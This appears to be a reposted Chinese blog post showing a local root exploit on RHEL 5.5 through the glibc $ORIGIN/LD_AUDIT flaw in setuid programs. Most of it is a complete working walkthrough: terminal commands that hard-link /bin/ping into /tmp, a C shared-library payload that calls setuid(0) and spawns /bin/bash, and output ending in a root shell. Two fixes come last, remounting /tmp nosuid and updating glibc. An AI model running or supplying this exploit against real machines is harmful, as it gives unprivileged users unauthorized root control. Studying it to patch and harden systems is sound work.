linux c root權限不夠,linux gcc++漏洞：普通使用者獲得root權限

linux gcc++漏洞：普通使用者獲得root權限

*本内容參考自他人部落格文章*

Crushlinux 已經在RHEL5.5 32上測試過

原理：The GNU C library dynamic linker expands $ORIGIN in setuid library search path

1、建立一個普通測試使用者：

[[email protected] ~]# useradd test

[[email protected] ~]# passwd test

Changing password for user test.

New UNIX password:

BAD PASSWORD: it is too short

Retype new UNIX password:

passwd: all authentication tokens updated successfully.

2、切換到這個使用者：

[[email protected] ~]# su - test

[[email protected] ~]$ whoami

test

[[email protected] ~]$ useradd user1

-bash: useradd: command not found

3、開始提權

[[email protected] ~]$ mkdir /tmp/exploit

[[email protected] ~]$ ln /bin/ping /tmp/exploit/target

[[email protected] ~]$ exec 3< /tmp/exploit/target

[[email protected] ~]$ ls -l /proc/$$/fd/3

lr-x------ 1 test test 64 08-07 17:43 /proc/5922/fd/3 -> /tmp/exploit/target

[[email protected] ~]$ rm -rf /tmp/exploit/

[[email protected] ~]$ ls -l /proc/$$/fd/3

lr-x------ 1 test test 64 08-07 17:43 /proc/5922/fd/3 -> /tmp/exploit/target (deleted)

[[email protected] ~]$ cat > payload.c

----------------------------------------

void __attribute__((constructor)) init()

{

setuid(0);

system("/bin/bash");

}

----------------------------------------

[[email protected] ~]$ cat payload.c

void __attribute__((constructor)) init()

{

setuid(0);

system("/bin/bash");

}

[[email protected] ~]$ gcc -w -fPIC -shared -o /tmp/exploit payload.c

[[email protected] ~]$ ls -l /tmp/exploit

-rwxrwxr-x 1 test test 4223 08-07 17:43 /tmp/exploit

[[email protected] ~]$ LD_AUDIT="$ORIGIN" exec /proc/self/fd/3

Usage: ping [-LRUbdfnqrvVaA] [-c count] [-i interval] [-w deadline]

[-p pattern] [-s packetsize] [-t ttl] [-I interface or address]

[-M mtu discovery hint] [-S sndbuf]

[ -T timestamp option ] [ -Q tos ] [hop1 ...] destination

4、權限驗證：

[[email protected] ~]# whoami

root

[[email protected] ~]# useradd user1

[[email protected] ~]# useradd user2

[[email protected] ~]# ls /home/

test user1 user2

[[email protected] ~]# id

uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

大家看到提權後的結果了，作為運維工程師遇到這類問題，就需要提供解決方法了！

有兩種解決辦法：

1、綁定目錄

nosuid的原理：像/etc/passwd這種檔案，本來隻有root使用者有權限修改，但是使用者本身也可以修改自己的密碼(超出它本身權限的行為)nosuid可以停止這種提升特權的辦法。比如/tmp目錄就有這樣的權限，我們就需要對它嚴加控制。

mount -o bind /tmp /tmp

mount -o remount,bind,nosuid /tmp /tmp

2、更新glibc版本(紅帽官方推薦)

yum -y update glibc

希望看到此文章的運維同僚們能夠及時的更新軟體及更新檔。